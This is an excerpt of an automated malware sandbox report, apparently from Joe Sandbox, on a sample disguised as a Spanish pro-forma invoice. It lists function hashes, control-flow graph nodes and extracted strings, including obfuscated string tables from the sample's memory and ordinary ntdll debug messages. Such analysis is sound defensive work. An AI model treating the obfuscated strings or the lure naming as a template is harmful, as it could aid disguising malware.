                                                  • API String ID:
                                                  • Opcode ID: 16516712ad825382bb7239b9b78b12e229576d78d5fabcd32d02ac43d471050b
                                                  • Instruction ID: f2998a766011eceddaeb6ac6819a02eb0c4c0f73706ee39b223fe0705cf569f6
                                                  • Opcode Fuzzy Hash: 16516712ad825382bb7239b9b78b12e229576d78d5fabcd32d02ac43d471050b
                                                  • Instruction Fuzzy Hash: C190023125100442D54172594505606000957D0241FD1C517A1418914EC6658E5AFA62
                                                  Function 36773C90 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2caae9c46302d1f9e1c4586e8f479b863e9808852513f9cfde02195537de563d
                                                  • Instruction ID: 952ddad1c40c72dcdb36f60cd6266499cecf33f23a3d7608e5f5ac6aa0c468f0
                                                  • Opcode Fuzzy Hash: 2caae9c46302d1f9e1c4586e8f479b863e9808852513f9cfde02195537de563d
                                                  • Instruction Fuzzy Hash: B990023521100442D91062595905646004647D0301F91D916A1418918DC6648CA5F122
                                                  Function 36772D50 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 512e40ded49829f6f7f0ab474d468e9c4ab21324ca178824e5b5f47d5af26643
                                                  • Instruction ID: 9e4275371ad3a2c6137fcc990bfd85c4a6852e94e886fc7c1bca7ed808cac2e5
                                                  • Opcode Fuzzy Hash: 512e40ded49829f6f7f0ab474d468e9c4ab21324ca178824e5b5f47d5af26643
                                                  • Instruction Fuzzy Hash: 2F90022131100442D50262594515606000987D1345FD1C517E2418915DC6358D57F133
                                                  Function 36772DC0 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 38331c85b1cbfde821ee95a9c59e3cfd1d33d73e95933f48e643add08e775f3e
                                                  • Instruction ID: 0b4e3a0e79a1168bdc33d4d472a6cd0acd3c70465018a99f1ab7f64bf9104d3a
                                                  • Opcode Fuzzy Hash: 38331c85b1cbfde821ee95a9c59e3cfd1d33d73e95933f48e643add08e775f3e
                                                  • Instruction Fuzzy Hash: 7B90027121100442D54072594505746000547D0301F91C516A6058914EC6698DD9B666
                                                  Function 36772DA0 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4d3ce6e6eb5d2bdd689dcfcadd1eadb6b70d32a7dbbb4574aff2141ef0802d82
                                                  • Instruction ID: b8906a73be15722bc1f6569ee6b5c3ca0434209b574ba8514af6d0847a67ed8d
                                                  • Opcode Fuzzy Hash: 4d3ce6e6eb5d2bdd689dcfcadd1eadb6b70d32a7dbbb4574aff2141ef0802d82
                                                  • Instruction Fuzzy Hash: FC90022161100542D50172594505616000A47D0241FD1C527A2018915ECA358D96F132
                                                  Function 36772A10 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c6a343000d0072c608299476db3481b58b4507c1cb21b28b651af430c6599b82
                                                  • Instruction ID: 01f8d46dfdff79aa1a2269e4489be9a26fe264ca25eaff4e3cd18a08ec57c6b2
                                                  • Opcode Fuzzy Hash: c6a343000d0072c608299476db3481b58b4507c1cb21b28b651af430c6599b82
                                                  • Instruction Fuzzy Hash: F0900225231000420545A659070550B044557D63513D1C51AF240A950CC6318C69A322
                                                  Function 36772AC0 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d1dbedd91290f33f81f89168a42d18975e92b6fcfd955aeb1e51bf98ad7f8d46
                                                  • Instruction ID: a94dad392c521f3223258d128ea3e9d911a1994991808e9b022fc05397f6adc2
                                                  • Opcode Fuzzy Hash: d1dbedd91290f33f81f89168a42d18975e92b6fcfd955aeb1e51bf98ad7f8d46
                                                  • Instruction Fuzzy Hash: 6890023161500842D55072594515746000547D0301F91C516A1018A14DC7658E59B6A2
                                                  Function 36772AA0 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 509cdac44d33e7801bbb1ccd858e33824e4949e6b1a6b458e735df0ec0a7327e
                                                  • Instruction ID: afddede68c76432349260fe416c59ef2c54254ee174b1c84481c3ea483cb1fb9
                                                  • Opcode Fuzzy Hash: 509cdac44d33e7801bbb1ccd858e33824e4949e6b1a6b458e735df0ec0a7327e
                                                  • Instruction Fuzzy Hash: BE90023121100842D50462594905686000547D0301F91C516A7018A15ED6758C95B132
                                                  Function 36772B10 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: efdb5f48effe2df85ad774d1d370c1eb832606ccb6c6fd9c78bce26756604294
                                                  • Instruction ID: 96bf623d479366ec516d393484b252e9b66c471dedfa187e5c8670d1fa7fad13
                                                  • Opcode Fuzzy Hash: efdb5f48effe2df85ad774d1d370c1eb832606ccb6c6fd9c78bce26756604294
                                                  • Instruction Fuzzy Hash: 1B90023121100842D5807259450564A000547D1301FD1C51AA1019A14DCA258E5DB7A2
                                                  Function 36772B00 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: cabf2c9e8e3bb7b651d8889a78411e501b06d941db69099e6ea9bbf9612f2756
                                                  • Instruction ID: b8f288f5f78307f4537744a01972cfee1d24aa5d45bd158003a5961c50d508c5
                                                  • Opcode Fuzzy Hash: cabf2c9e8e3bb7b651d8889a78411e501b06d941db69099e6ea9bbf9612f2756
                                                  • Instruction Fuzzy Hash: 6690023121504882D54072594505A46001547D0305F91C516A1058A54DD6358D59F662
                                                  Function 36772BE0 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a9168d86383bf7326047f7bce6fdcd07c515f068c017c11fa9ed26ecc9143d9e
                                                  • Instruction ID: 59b5ab96894f4f7ead27d12ec66322d39da8502e832fa3df851925c8ae6b61c5
                                                  • Opcode Fuzzy Hash: a9168d86383bf7326047f7bce6fdcd07c515f068c017c11fa9ed26ecc9143d9e
                                                  • Instruction Fuzzy Hash: 0D90022161500442D54072595519706001547D0201F91D516A1018914DC6698E59B6A2
                                                  Function 36772B80 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 364f2f9e5a3b8fc16dc524c5b2824b0c6a5014fee821c58cd2c9c83421c6c645
                                                  • Instruction ID: 1fa9682f5fab317a996a26bbc4247ca89cb6d6fe08aa2d2e09d693a663e41fd7
                                                  • Opcode Fuzzy Hash: 364f2f9e5a3b8fc16dc524c5b2824b0c6a5014fee821c58cd2c9c83421c6c645
                                                  • Instruction Fuzzy Hash: 3D90023121100882D50062594505B46000547E0301F91C51BA1118A14DC625CC55B522
                                                  Function 367738D0 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 191d85bcbaf75d87e5b5324779156cfeae59388ec81532f12d004455be124393
                                                  • Instruction ID: db46f5f1a0c798594aecac595d855401fbdc6eae8c97dbaffd9321374a81ea61
                                                  • Opcode Fuzzy Hash: 191d85bcbaf75d87e5b5324779156cfeae59388ec81532f12d004455be124393
                                                  • Instruction Fuzzy Hash: 9190022125505142D550725D4505616400567E0201F91C526A1808954DC5658C59B222
                                                  Function 367729F0 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2e6a324b75961dc2ff9a73c7e7ca8ed0ed89d5744c42eaa021bee74fba5a9bfe
                                                  • Instruction ID: 030b140350629527fe9508a83021d700cece040bf343f413acfc014e0dd44e2c
                                                  • Opcode Fuzzy Hash: 2e6a324b75961dc2ff9a73c7e7ca8ed0ed89d5744c42eaa021bee74fba5a9bfe
                                                  • Instruction Fuzzy Hash: 89900225221000430505A6590705507004647D5351391C526F2009910CD6318C65A122
                                                  Function 367729D0 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 462ff1f16749e3f23706a629a5b08ace63d1f3ca4afc8d693583c3e74d2be189
                                                  • Instruction ID: 76320d852c51192cb982c3b75c7824bc81b5b684d233b58d142e560c44c09d51
                                                  • Opcode Fuzzy Hash: 462ff1f16749e3f23706a629a5b08ace63d1f3ca4afc8d693583c3e74d2be189
                                                  • Instruction Fuzzy Hash: B59002A1211140D24900A3598505B0A450547E0201B91C51BE2048920CC5358C55E136
                                                  Function 36772B20 Relevance: .0, Instructions: 2COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                  • Instruction ID: 3bdeb668abbb0dafe27d841309531e01cf633ce7ead4fc7d98558a4e32a99693
                                                  • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                  • Instruction Fuzzy Hash:
                                                  Function 3643DFE9 Relevance: 56.5, Strings: 45, Instructions: 216COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 6 3643dfe9-3643dff7 7 3643e039-3643e1d7 6->7 8 3643dff9-3643e033 6->8 9 3643e1d9-3643e1e4 7->9 8->7 9->9 10 3643e1e6-3643e201 9->10 11 3643e207-3643e220 10->11 12 3643e294-3643e298 10->12 15 3643e228-3643e28a 11->15 13 3643e2ba-3643e2be 12->13 14 3643e29a-3643e2b7 12->14 16 3643e2e1-3643e2e5 13->16 17 3643e2c0-3643e2de 13->17 14->13 15->15 18 3643e28c-3643e28d 15->18 19 3643e302-3643e31b 16->19 20 3643e2e7-3643e2ff 16->20 17->16 18->12 20->19
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84425845160.0000000036430000.00000040.00001000.00020000.00000000.sdmp, Offset: 36430000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36430000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                  • API String ID: 0-3558027158
                                                  • Opcode ID: bba84479ca0e527e396de878824c251d4087746879150ccee397b5ba28a2125e
                                                  • Instruction ID: 94b8904319238a626ba48b28ba1c0accccd59745f5ebb646630360f42de8b94f
                                                  • Opcode Fuzzy Hash: bba84479ca0e527e396de878824c251d4087746879150ccee397b5ba28a2125e
                                                  • Instruction Fuzzy Hash: 549150F04082988AC7158F54A1612AFFFB1EBC6305F15856DE7E6BB243C3BE8915CB85
                                                  Function 36433AE9 Relevance: 41.3, Strings: 33, Instructions: 85COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 21 36433ae9-36433aea 22 36433ac3-36433ad1 21->22 23 36433aec-36433c00 21->23 24 36433ad3-36433ae8 call 364412c8 22->24 25 36433ac8-36433ad1 22->25 26 36433c08-36433c11 23->26 25->24 25->25 26->26 27 36433c13-36433c2d call 364412c8 26->27
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84425845160.0000000036430000.00000040.00001000.00020000.00000000.sdmp, Offset: 36430000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36430000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: m&y$"7rv$&+5#$( j&$+5,$41 j$4hr|$4sov$7rvz$7zkk$cvw $cvw7$j&+5$kwrx$ortu$ovw0$o~co$rtu4$rvz|$rxzo$u4cs$u|71$w7zk$wrxz$zkkw$zmr}$zort$zu|~$z|~4$|~4l$~4zk$~cxs$~yk7
                                                  • API String ID: 0-2177023512
                                                  • Opcode ID: ee8e79c226699630d0eb9eec209678fe051a02f6a965b9d359e4c9b7ca293d66
                                                  • Instruction ID: e4fc183d5bd3fb1bc6a31a2b559d73730a48ca247fbcb5d67b8d50019aaf8329
                                                  • Opcode Fuzzy Hash: ee8e79c226699630d0eb9eec209678fe051a02f6a965b9d359e4c9b7ca293d66
                                                  • Instruction Fuzzy Hash: 733169B0814788ABCF169F95D441AEDBF71FF05384FA4815DE844AF368CB348656CB89
                                                  Function 36433C2E Relevance: 32.6, Strings: 26, Instructions: 61COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 125 36433c2e-36433d15 126 36433d18-36433d21 125->126 126->126 127 36433d23-36433d3b call 364412c8 126->127
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84425845160.0000000036430000.00000040.00001000.00020000.00000000.sdmp, Offset: 36430000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36430000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: )1$"&?"$"'19$#&#?$$"&?$$?!1$'%81$'?#*$1F^F$1_E1$?!?#$Bpwp$Paa}$Vtrz$ZYE\$Zxe>$\~kx$]=1}$cx>$$t>% $tFts$u~fb$xzt1$yc~|$}}p>$~81R
                                                  • API String ID: 0-1971733961
                                                  • Opcode ID: b56f50a2d295e573f5c4fc8584c638188333b0a489a1539a27dbbaceb391ba79
                                                  • Instruction ID: fa9958810f780c464a556790f328a8468fbaaf392e7f04176ff466ab7304ef48
                                                  • Opcode Fuzzy Hash: b56f50a2d295e573f5c4fc8584c638188333b0a489a1539a27dbbaceb391ba79
                                                  • Instruction Fuzzy Hash: BA2175B090424DEBCF19DF80E590AEDBBB2FF05308F40515DE9086F294D7729A69CB89
                                                  Function 3680A1F0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 285timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: HEAP:
                                                  • API String ID: 3446177414-2466845122
                                                  • Opcode ID: c8558c82252d60d5646349cf5114ca5d5593492858c033fcfb7a739f9822c14e
                                                  • Instruction ID: a0d1104baa2fe49ae7058ba500dfa1821ff8831116b4b736a2fc0012e14ed3dd
                                                  • Opcode Fuzzy Hash: c8558c82252d60d5646349cf5114ca5d5593492858c033fcfb7a739f9822c14e
                                                  • Instruction Fuzzy Hash: F6A1DB75A14311AFD714CE19C894A5EB7E6FB8C354F054929EA41DB312EBB0EC4ACB81
                                                  Function 36767550 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 194COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 367A4460
                                                  • ExecuteOptions, xrefs: 367A44AB
                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 367A454D
                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 367A4507
                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 367A4592
                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 367A4530
                                                  • Execute=1, xrefs: 367A451E
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                  • API String ID: 0-484625025
                                                  • Opcode ID: 85bae28f17595b185a48f1fda0661db37cc38917adc823f8db89026812d4e9e7
                                                  • Instruction ID: 5cf8301f413146dc6b86615b5ca022e52b08ae99166544607bea68e12d7016bc
                                                  • Opcode Fuzzy Hash: 85bae28f17595b185a48f1fda0661db37cc38917adc823f8db89026812d4e9e7
                                                  • Instruction Fuzzy Hash: 23510C719003196AEF109B96DC8DFFD7769AF04388FD005E9DA05AF182EB319A85CF61
                                                  Function 3674A170 Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 404COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • SsHd, xrefs: 3674A304
                                                  • Actx , xrefs: 36797819, 36797880
                                                  • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 36797807
                                                  • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 367978F3
                                                  • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 367977E2
                                                  • RtlpFindActivationContextSection_CheckParameters, xrefs: 367977DD, 36797802
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                  • API String ID: 0-1988757188
                                                  • Opcode ID: 83a6e0eef9facd088058912703c220752d548e665c3f14d6f9ffead206c3a7a2
                                                  • Instruction ID: 805a537a835d728b2d4b905dcd77f97d82bd16fa4c66f3c5c731c1393412a531
                                                  • Opcode Fuzzy Hash: 83a6e0eef9facd088058912703c220752d548e665c3f14d6f9ffead206c3a7a2
                                                  • Instruction Fuzzy Hash: 57E12874A043018FE716DE29C889BAAB7E2BF85354FD04A2DF855CF294DB71D845CB81
                                                  Function 3674D690 Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 372timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  • Actx , xrefs: 36799315
                                                  • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 36799178
                                                  • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 36799372
                                                  • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 36799153
                                                  • RtlpFindActivationContextSection_CheckParameters, xrefs: 3679914E, 36799173
                                                  • GsHd, xrefs: 3674D794
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
